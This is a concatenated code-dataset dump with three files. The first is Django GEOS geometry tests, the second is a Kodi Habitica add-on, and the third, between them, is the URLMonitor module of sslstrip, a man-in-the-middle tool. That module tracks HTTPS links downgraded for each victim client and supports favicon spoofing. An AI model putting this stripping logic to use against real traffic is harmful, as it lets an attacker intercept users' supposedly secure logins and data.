g = GEOSGeometry('POINT (-104.609 38.255)', srid=None)
self.assertRaises(GEOSException, g.transform, 2774, clone=True)
g = GEOSGeometry('POINT (-104.609 38.255)', srid=-1)
self.assertRaises(GEOSException, g.transform, 2774)
g = GEOSGeometry('POINT (-104.609 38.255)', srid=-1)
self.assertRaises(GEOSException, g.transform, 2774, clone=True)
@mock.patch('django.contrib.gis.gdal.HAS_GDAL', False)
def test_transform_nogdal(self):
""" Testing `transform` method (GDAL not available) """
g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
self.assertRaises(GEOSException, g.transform, 2774)
g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
self.assertRaises(GEOSException, g.transform, 2774, clone=True)
def test_extent(self):
"Testing `extent` method."
# The xmin, ymin, xmax, ymax of the MultiPoint should be returned.
mp = MultiPoint(Point(5, 23), Point(0, 0), Point(10, 50))
self.assertEqual((0.0, 0.0, 10.0, 50.0), mp.extent)
pnt = Point(5.23, 17.8)
# Extent of points is just the point itself repeated.
self.assertEqual((5.23, 17.8, 5.23, 17.8), pnt.extent)
# Testing on the 'real world' Polygon.
poly = fromstr(self.geometries.polygons[3].wkt)
ring = poly.shell
x, y = ring.x, ring.y
xmin, ymin = min(x), min(y)
xmax, ymax = max(x), max(y)
self.assertEqual((xmin, ymin, xmax, ymax), poly.extent)
def test_pickle(self):
"Testing pickling and unpickling support."
# Using both pickle and cPickle -- just 'cause.
from django.utils.six.moves import cPickle
import pickle
# Creating a list of test geometries for pickling,
# and setting the SRID on some of them.
def get_geoms(lst, srid=None):
return [GEOSGeometry(tg.wkt, srid) for tg in lst]
tgeoms = get_geoms(self.geometries.points)
tgeoms.extend(get_geoms(self.geometries.multilinestrings, 4326))
tgeoms.extend(get_geoms(self.geometries.polygons, 3084))
tgeoms.extend(get_geoms(self.geometries.multipolygons, 3857))
for geom in tgeoms:
s1, s2 = cPickle.dumps(geom), pickle.dumps(geom)
g1, g2 = cPickle.loads(s1), pickle.loads(s2)
for tmpg in (g1, g2):
self.assertEqual(geom, tmpg)
self.assertEqual(geom.srid, tmpg.srid)
def test_prepared(self):
"Testing PreparedGeometry support."
# Creating a simple multipolygon and getting a prepared version.
mpoly = GEOSGeometry('MULTIPOLYGON(((0 0,0 5,5 5,5 0,0 0)),((5 5,5 10,10 10,10 5,5 5)))')
prep = mpoly.prepared
# A set of test points.
pnts = [Point(5, 5), Point(7.5, 7.5), Point(2.5, 7.5)]
covers = [True, True, False] # No `covers` op for regular GEOS geoms.
for pnt, c in zip(pnts, covers):
# Results should be the same (but faster)
self.assertEqual(mpoly.contains(pnt), prep.contains(pnt))
self.assertEqual(mpoly.intersects(pnt), prep.intersects(pnt))
self.assertEqual(c, prep.covers(pnt))
self.assertTrue(prep.crosses(fromstr('LINESTRING(1 1, 15 15)')))
self.assertTrue(prep.disjoint(Point(-5, -5)))
poly = Polygon(((-1, -1), (1, 1), (1, 0), (-1, -1)))
self.assertTrue(prep.overlaps(poly))
poly = Polygon(((-5, 0), (-5, 5), (0, 5), (-5, 0)))
self.assertTrue(prep.touches(poly))
poly = Polygon(((-1, -1), (-1, 11), (11, 11), (11, -1), (-1, -1)))
self.assertTrue(prep.within(poly))
# Original geometry deletion should not crash the prepared one (#21662)
del mpoly
self.assertTrue(prep.covers(Point(5, 5)))
def test_line_merge(self):
"Testing line merge support"
ref_geoms = (fromstr('LINESTRING(1 1, 1 1, 3 3)'),
fromstr('MULTILINESTRING((1 1, 3 3), (3 3, 4 2))'),
)
ref_merged = (fromstr('LINESTRING(1 1, 3 3)'),
fromstr('LINESTRING (1 1, 3 3, 4 2)'),
)
for geom, merged in zip(ref_geoms, ref_merged):
self.assertEqual(merged, geom.merged)
def test_valid_reason(self):
"Testing IsValidReason support"
g = GEOSGeometry("POINT(0 0)")
self.assertTrue(g.valid)
self.assertIsInstance(g.valid_reason, six.string_types)
self.assertEqual(g.valid_reason, "Valid Geometry")
g = GEOSGeometry("LINESTRING(0 0, 0 0)")
self.assertFalse(g.valid)
self.assertIsInstance(g.valid_reason, six.string_types)
self.assertTrue(g.valid_reason.startswith("Too few points in geometry component"))
@skipUnless(HAS_GEOS, "Geos is required.")
def test_linearref(self):
"Testing linear referencing"
ls = fromstr('LINESTRING(0 0, 0 10, 10 10, 10 0)')
mls = fromstr('MULTILINESTRING((0 0, 0 10), (10 0, 10 10))')
self.assertEqual(ls.project(Point(0, 20)), 10.0)
self.assertEqual(ls.project(Point(7, 6)), 24)
self.assertEqual(ls.project_normalized(Point(0, 20)), 1.0 / 3)
self.assertEqual(ls.interpolate(10), Point(0, 10))
self.assertEqual(ls.interpolate(24), Point(10, 6))
self.assertEqual(ls.interpolate_normalized(1.0 / 3), Point(0, 10))
self.assertEqual(mls.project(Point(0, 20)), 10)
self.assertEqual(mls.project(Point(7, 6)), 16)
self.assertEqual(mls.interpolate(9), Point(0, 9))
self.assertEqual(mls.interpolate(17), Point(10, 7))
def test_geos_version(self):
"""Testing the GEOS version regular expression."""
from django.contrib.gis.geos.libgeos import version_regex
versions = [('3.0.0rc4-CAPI-1.3.3', '3.0.0', '1.3.3'),
('3.0.0-CAPI-1.4.1', '3.0.0', '1.4.1'),
('3.4.0dev-CAPI-1.8.0', '3.4.0', '1.8.0'),
('3.4.0dev-CAPI-1.8.0 r0', '3.4.0', '1.8.0')]
for v_init, v_geos, v_capi in versions:
m = version_regex.match(v_init)
self.assertTrue(m, msg="Unable to parse the version string '%s'" % v_init)
self.assertEqual(m.group('version'), v_geos)
self.assertEqual(m.group('capi_version'), v_capi)
|
bsd-3-clause
|
glennbarrett/sslstrip
|
sslstrip/URLMonitor.py
|
60
|
2839
|
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import re
class URLMonitor:
'''
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
server is expecting over SSL. It also keeps track of secure favicon urls.
'''
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
def __init__(self):
self.strippedURLs = set()
self.strippedURLPorts = {}
self.faviconReplacement = False
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
if (re.match(expression, url)):
return True
return (client,url) in self.strippedURLs
def getSecurePort(self, client, url):
if (client,url) in self.strippedURLs:
return self.strippedURLPorts[(client,url)]
else:
return 443
def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2
method = url[0:methodIndex]
pathIndex = url.find("/", methodIndex)
host = url[methodIndex:pathIndex]
path = url[pathIndex:]
port = 443
portIndex = host.find(":")
if (portIndex != -1):
host = host[0:portIndex]
port = host[portIndex+1:]
if len(port) == 0:
port = 443
url = method + host + path
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
def setFaviconSpoofing(self, faviconSpoofing):
self.faviconSpoofing = faviconSpoofing
def isFaviconSpoofing(self):
return self.faviconSpoofing
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
def getInstance():
if URLMonitor._instance == None:
URLMonitor._instance = URLMonitor()
return URLMonitor._instance
getInstance = staticmethod(getInstance)
|
gpl-3.0
|
Majed6/kodi-habitica
|
script.habitica/addon.py
|
1
|
6718
|
#! python3
# -*- coding: utf-8 -*-
import os
import xbmcaddon
import xbmcgui
import datetime
import resources.lib.httplib2 as httplib2
import urllib
import json
addon = xbmcaddon.Addon()
dialog = xbmcgui.Dialog()
http = httplib2.Http()
class Habitica(xbmcgui.Window):
def __init__(self):
self.background = xbmcgui.ControlImage(0, 0, 1280, 720, 'special://home/addons/script.habitica/resources/media/fanart.jpg')
self.profile = xbmcgui.ControlLabel(450,0,700,50,'XP:0/0 HP:0/0 Gold:0 Silver:0')
self.habitsButton = xbmcgui.ControlButton(0, 50, 200, 50, 'Habits',textOffsetX=70)
self.dailiesButton = xbmcgui.ControlButton(200, 50, 200, 50, 'Dailies',textOffsetX=70)
self.todoButton = xbmcgui.ControlButton(400, 50, 200, 50, 'TODO',textOffsetX=70)
self.cList = xbmcgui.ControlList(0, 110, 800, 550,selectedColor="0xC0FF0000")
self.avatar = xbmcgui.ControlImage(900, 90, 350, 350,'special://home/addons/script.habitica/resources/media/icon.png')
self.addControl(self.background)
self.addControl(self.profile)
self.addControl(self.habitsButton)
self.addControl(self.dailiesButton)
self.addControl(self.todoButton)
self.addControl(self.cList)
self.addControl(self.avatar)
self.API_Token = addon.getSetting("API_Token").decode("utf-8")
self.ID = addon.getSetting("ID").decode("utf-8")
#def onClick(self,controlId):
#self.close()
'''def onAction(self, action):
if action.getId()==4:
dialog.ok('action',str(action.getId()))
self.setFocus(self.todoButton)
dialog.ok('action',str(self.todoButton.getId()))'''
def onControl(self,Control):
if Control==self.habitsButton:
self.getAllhabits()
elif Control==self.dailiesButton:
self.getAllDaillies()
elif Control==self.todoButton:
self.getAllTasks()
elif Control==self.cList:
choice = dialog.yesno('Mark as complete',"Do you want to mark \""+Control.getSelectedItem().getLabel()+"\" as Complete?")#+str(Control.getId())
if choice:
self.score(Control.getSelectedItem())
else:
Control
def login(self):
username = dialog.input('Login Username')
password = dialog.input('Login Password',option=xbmcgui.ALPHANUM_HIDE_INPUT)
url = 'https://habitica.com/api/v3/user/auth/local/login'
body = {'username': username, 'password': password}
headers = {'Accept': 'application/json','Content-type': 'application/x-www-form-urlencoded'}
response, content = http.request(url, 'POST', headers=headers, body=urllib.urlencode(body))
#dialog.ok('response', str(response)) not intersting
#dialog.ok('response', response['status'])
if response['status']!="200":
msg = response['status']+': Login failed. Do you want to retry?'
choice = dialog.yesno('Login Failed',msg)
if choice:
self.login()
else:
quit()
return
dContent = json.loads(content)
addon.setSetting(id='API_Token', value=dContent['data']['apiToken'])
addon.setSetting(id='ID', value=dContent['data']['id'])
def callAPI(self,method, partialURL, postData):
if self.API_Token=='':
self.login()
baseURL = 'https://habitica.com/api/v3'
headers = {'Accept': 'application/json','Content-type': 'application/x-www-form-urlencoded','x-api-user':self.ID,'x-api-key':self.API_Token}
response, content = http.request(baseURL+partialURL, method, headers=headers, body=urllib.urlencode(postData))
return json.loads(content)
def getProfile(self):
profile = self.callAPI('GET', '/members/'+self.ID,'')['data']['stats']
gold = int(profile['gp'])
silver = int((profile['gp']-gold)*100)
level = profile['lvl']
xp = profile['exp']
hp = profile['hp'] #max health is always 50
lvlupAt = int(round((0.25*(level**2)+10*level+139.75)/10)*10)
tProfile = "XP:"+str(xp)+"/"+str(lvlupAt)+" HP:"+str(hp)+"/50"+" Gold:"+str(gold)+" Silver:"+str(silver)
self.profile.setLabel(tProfile)
self.getAvatar()
return profile
def getAllTasks(self):
tasks = self.callAPI('GET','/tasks/user?type=todos','')['data']
if tasks==[]:
dialog.ok('All tasks Completed','You have completed all of your tasks!')
return
self.cList.reset()
for task in tasks:
tTask =task['text']+""
listitem = xbmcgui.ListItem(tTask,'label2')
listitem.setProperty('type', 'task')
listitem.setUniqueIDs({ 'id': task['id']})
self.cList.addItem(listitem)
def getAllDaillies(self):
dailies = self.callAPI('GET','/tasks/user?type=dailys','')['data']
if dailies==[]:
dialog.ok('There are no dailies!')
return
self.cList.reset()
#{0: 'Monday', 1: 'Tuesday', 2: 'Wednesday', 3: 'Thursday', 4: 'Friday', 5: 'Saturday', 6: 'Sunday'}
weekday = {0: 'm', 1: 't', 2: 'w', 3: 'th', 4: 'f', 5: 's', 6: 'su'}
today = weekday[datetime.datetime.today().weekday()]
for daily in dailies:
if daily['repeat'][today] and not daily['completed']:
tDaily=daily['text']+""
listitem = xbmcgui.ListItem(tDaily)
listitem.setProperty('type', 'daily')
listitem.setUniqueIDs({ 'id': daily['id']})
self.cList.addItem(listitem)
if self.cList.size()==0:
dialog.ok('No dailies for today!')
def getAllhabits(self):
habits = self.callAPI('GET','/tasks/user?type=habits','')['data']
if habits==[]:
dialog.ok('There are no habits!')
return
self.cList.reset()
for habit in habits:
tHabit = habit['text']+""
listitem = xbmcgui.ListItem(tHabit)
listitem.setProperty('type', 'habit')
listitem.setUniqueIDs({ 'id': habit['id']})
self.cList.addItem(listitem)
def getAvatar(self):
avatar = 'https://habitica.com/export/avatar-'+self.ID+'.png'
self.avatar.setImage(avatar,False)
def score(self,item):
before = self.getProfile()
after = self.callAPI("POST", '/tasks/' + item.getUniqueID('id') + '/score/' + 'up','')['data']
gold = abs(int(after['gp']-before['gp']))
silver = abs(int(((after['gp']-int(after['gp']))-(before['gp']-int(before['gp'])))*100))
xp = after['exp']-before['exp']
habiticaNotiXP = "★+"+str(xp)+" Experince"
habiticaNotiCash = "⚫+"+str(gold)+" GOLD"+" ⚪+"+str(silver)+" Silver"
if item.getProperty('type')=='task':
dialog.notification('Task scored',habiticaNotiXP,xbmcgui.NOTIFICATION_INFO)
dialog.notification('Task scored',habiticaNotiCash,xbmcgui.NOTIFICATION_INFO)
self.getAllTasks()
elif item.getProperty('type')=='daily':
dialog.notification('Daily scored',habiticaNotiXP,xbmcgui.NOTIFICATION_INFO)
dialog.notification('Daily scored',habiticaNotiCash,xbmcgui.NOTIFICATION_INFO)
self.getAllDaillies()
elif item.getProperty('type')=='habit':
dialog.notification('Habit scored',habiticaNotiXP,xbmcgui.NOTIFICATION_INFO)
dialog.notification('Habit scored',habiticaNotiCash,xbmcgui.NOTIFICATION_INFO)
self.getAllHabits()
win = Habitica()
win.show()
win.getProfile()
win.getAllTasks()
win.doModal()
|
gpl-3.0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.